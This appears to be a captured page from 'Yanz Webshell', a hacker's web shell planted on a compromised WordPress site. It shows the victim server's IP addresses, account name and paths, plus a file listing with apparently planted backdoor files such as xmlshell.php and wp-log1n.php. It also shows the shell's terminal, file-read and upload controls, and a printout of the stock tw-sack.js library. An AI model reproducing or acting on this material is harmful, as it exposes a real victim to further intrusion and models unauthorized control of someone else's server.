Attention:
Uname:
Php:
Hdd:
Cwd:		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
8.1.33 Safe mode: OFF Datetime: 2025-12-17 06:21:56
2792.60 GB Free: 1878.60 GB (67%)
/home/kheruwym/public_html/ dr-xr-xr-x [ root ] [ home ] Text

Server IP:
202.131.4.21
Client IP:
216.73.216.190
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2025-11-28 13:13:32dr-xr-xr-xRename Touch
[ .. ]dir2025-12-16 19:14:39drwx--x--xRename Touch
[ .tmb ]dir2025-11-12 07:07:40drwxrwxrwxRename Touch
[ .well-known ]dir2025-11-12 07:07:35drwxr-xr-xRename Touch
[ 117cb ]dir2025-11-14 05:53:05dr-xr-xr-xRename Touch
[ 1d8b10 ]dir2025-11-14 08:28:52drwxr-xr-xRename Touch
[ cgi-bin ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ f4727b ]dir2025-11-19 07:48:55drwxr-xr-xRename Touch
[ images ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ wp-admin ]dir2025-11-26 03:07:13drwxr-xr-xRename Touch
[ wp-content ]dir2025-11-22 08:16:38drwxr-xr-xRename Touch
[ wp-includes ]dir2025-11-22 08:16:25drwxr-xr-xRename Touch
.htaccess1.13 KB2025-11-28 13:17:43-r-xr-xr-xRename Touch Edit Download
.htaccess.phpupgrader.574027731.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.9e97ffcf1.45 KB2023-08-02 18:50:37-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.initial1.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
click.php1.93 KB2023-09-14 08:16:25-r--r--r--Rename Touch Edit Download
defaults.php1.93 KB2023-07-21 03:50:14-r--r--r--Rename Touch Edit Download
ex.php5.96 KB2025-11-28 13:13:32-rw-r--r--Rename Touch Edit Download
header.php0 B2025-11-10 06:52:51-rw-r--r--Rename Touch Edit Download
index.php35.97 KB2023-05-29 08:16:38-r-xr-xr-xRename Touch Edit Download
index.php035.97 KB2023-09-11 08:16:37-rwxr-xr-xRename Touch Edit Download
item.php1.29 KB2023-08-18 08:15:39-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
mah.php1.93 KB2023-12-31 03:48:47-r--r--r--Rename Touch Edit Download
networks.php1.29 KB2024-01-13 03:43:18-r--r--r--Rename Touch Edit Download
options.php1.93 KB2023-12-03 08:16:25-r--r--r--Rename Touch Edit Download
pages.php1.44 KB2023-07-28 08:15:18-r--r--r--Rename Touch Edit Download
php.ini40 B2025-11-18 19:54:41-rw-r--r--Rename Touch Edit Download
plugins.php1.87 KB2023-07-01 08:16:25-r--r--r--Rename Touch Edit Download
product.php2.03 KB2023-04-16 03:50:14-r--r--r--Rename Touch Edit Download
quoys.php26.20 KB2025-11-13 01:08:41-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2025-09-30 22:02:04-rw-r--r--Rename Touch Edit Download
robots.txt364 B2023-06-15 08:16:38-r--r--r--Rename Touch Edit Download
search.php1.46 KB2023-12-19 08:16:38-r--r--r--Rename Touch Edit Download
track.php6.49 KB2025-11-12 04:05:52-rw-r--r--Rename Touch Edit Download
txets.php5.89 KB2025-11-12 06:13:57-rw-r--r--Rename Touch Edit Download
wp-activate.php7.21 KB2024-04-02 19:31:34-rw-r--r--Rename Touch Edit Download
wp-blog-header.php347 B2025-11-10 06:52:59-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2023-08-09 07:36:19-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
wp-config.php3.12 KB2022-02-15 07:01:10-rw-------Rename Touch Edit Download
wp-confiq.php0 B2025-11-10 06:52:50-rw-r--r--Rename Touch Edit Download
wp-cron.php5.51 KB2025-11-10 06:53:00-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-log1n.php1.72 KB2024-01-28 08:14:59-r--r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-settings.php29.38 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.98 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
xmlshell.php243.86 KB2025-11-13 16:26:34-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
User: kheruwym (1551)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/kheruwym/public_html/wp-includes/js/
Upload Files
File: /home/kheruwym/public_html/wp-includes/js/tw-sack.js
/* Simple AJAX Code-Kit (SACK) v1.6.1 */
/* �2005 Gregory Wild-Smith */
/* www.twilightuniverse.com */
/* Software licenced under a modified X11 licence,
   see documentation or authors website for more details */

function sack(file) {
	this.xmlhttp = null;

	this.resetData = function() {
		this.method = "POST";
  		this.queryStringSeparator = "?";
		this.argumentSeparator = "&";
		this.URLString = "";
		this.encodeURIString = true;
  		this.execute = false;
  		this.element = null;
		this.elementObj = null;
		this.requestFile = file;
		this.vars = new Object();
		this.responseStatus = new Array(2);
  	};

	this.resetFunctions = function() {
  		this.onLoading = function() { };
  		this.onLoaded = function() { };
  		this.onInteractive = function() { };
  		this.onCompletion = function() { };
  		this.onError = function() { };
		this.onFail = function() { };
	};

	this.reset = function() {
		this.resetFunctions();
		this.resetData();
	};

	this.createAJAX = function() {
		try {
			this.xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
		} catch (e1) {
			try {
				this.xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
			} catch (e2) {
				this.xmlhttp = null;
			}
		}

		if (! this.xmlhttp) {
			if (typeof XMLHttpRequest != "undefined") {
				this.xmlhttp = new XMLHttpRequest();
			} else {
				this.failed = true;
			}
		}
	};

	this.setVar = function(name, value){
		this.vars[name] = Array(value, false);
	};

	this.encVar = function(name, value, returnvars) {
		if (true == returnvars) {
			return Array(encodeURIComponent(name), encodeURIComponent(value));
		} else {
			this.vars[encodeURIComponent(name)] = Array(encodeURIComponent(value), true);
		}
	}

	this.processURLString = function(string, encode) {
		encoded = encodeURIComponent(this.argumentSeparator);
		regexp = new RegExp(this.argumentSeparator + "|" + encoded);
		varArray = string.split(regexp);
		for (i = 0; i < varArray.length; i++){
			urlVars = varArray[i].split("=");
			if (true == encode){
				this.encVar(urlVars[0], urlVars[1]);
			} else {
				this.setVar(urlVars[0], urlVars[1]);
			}
		}
	}

	this.createURLString = function(urlstring) {
		if (this.encodeURIString && this.URLString.length) {
			this.processURLString(this.URLString, true);
		}

		if (urlstring) {
			if (this.URLString.length) {
				this.URLString += this.argumentSeparator + urlstring;
			} else {
				this.URLString = urlstring;
			}
		}

		// prevents caching of URLString
		this.setVar("rndval", new Date().getTime());

		urlstringtemp = new Array();
		for (key in this.vars) {
			if (false == this.vars[key][1] && true == this.encodeURIString) {
				encoded = this.encVar(key, this.vars[key][0], true);
				delete this.vars[key];
				this.vars[encoded[0]] = Array(encoded[1], true);
				key = encoded[0];
			}

			urlstringtemp[urlstringtemp.length] = key + "=" + this.vars[key][0];
		}
		if (urlstring){
			this.URLString += this.argumentSeparator + urlstringtemp.join(this.argumentSeparator);
		} else {
			this.URLString += urlstringtemp.join(this.argumentSeparator);
		}
	}

	this.runResponse = function() {
		eval(this.response);
	}

	this.runAJAX = function(urlstring) {
		if (this.failed) {
			this.onFail();
		} else {
			this.createURLString(urlstring);
			if (this.element) {
				this.elementObj = document.getElementById(this.element);
			}
			if (this.xmlhttp) {
				var self = this;
				if (this.method == "GET") {
					totalurlstring = this.requestFile + this.queryStringSeparator + this.URLString;
					this.xmlhttp.open(this.method, totalurlstring, true);
				} else {
					this.xmlhttp.open(this.method, this.requestFile, true);
					try {
						this.xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
					} catch (e) { }
				}

				this.xmlhttp.onreadystatechange = function() {
					switch (self.xmlhttp.readyState) {
						case 1:
							self.onLoading();
							break;
						case 2:
							self.onLoaded();
							break;
						case 3:
							self.onInteractive();
							break;
						case 4:
							self.response = self.xmlhttp.responseText;
							self.responseXML = self.xmlhttp.responseXML;
							self.responseStatus[0] = self.xmlhttp.status;
							self.responseStatus[1] = self.xmlhttp.statusText;

							if (self.execute) {
								self.runResponse();
							}

							if (self.elementObj) {
								elemNodeName = self.elementObj.nodeName;
								elemNodeName.toLowerCase();
								if (elemNodeName == "input"
								|| elemNodeName == "select"
								|| elemNodeName == "option"
								|| elemNodeName == "textarea") {
									self.elementObj.value = self.response;
								} else {
									self.elementObj.innerHTML = self.response;
								}
							}
							if (self.responseStatus[0] == "200") {
								self.onCompletion();
							} else {
								self.onError();
							}

							self.URLString = "";
							break;
					}
				};

				this.xmlhttp.send(this.URLString);
			}
		}
	};

	this.reset();
	this.createAJAX();
}
@ Telegram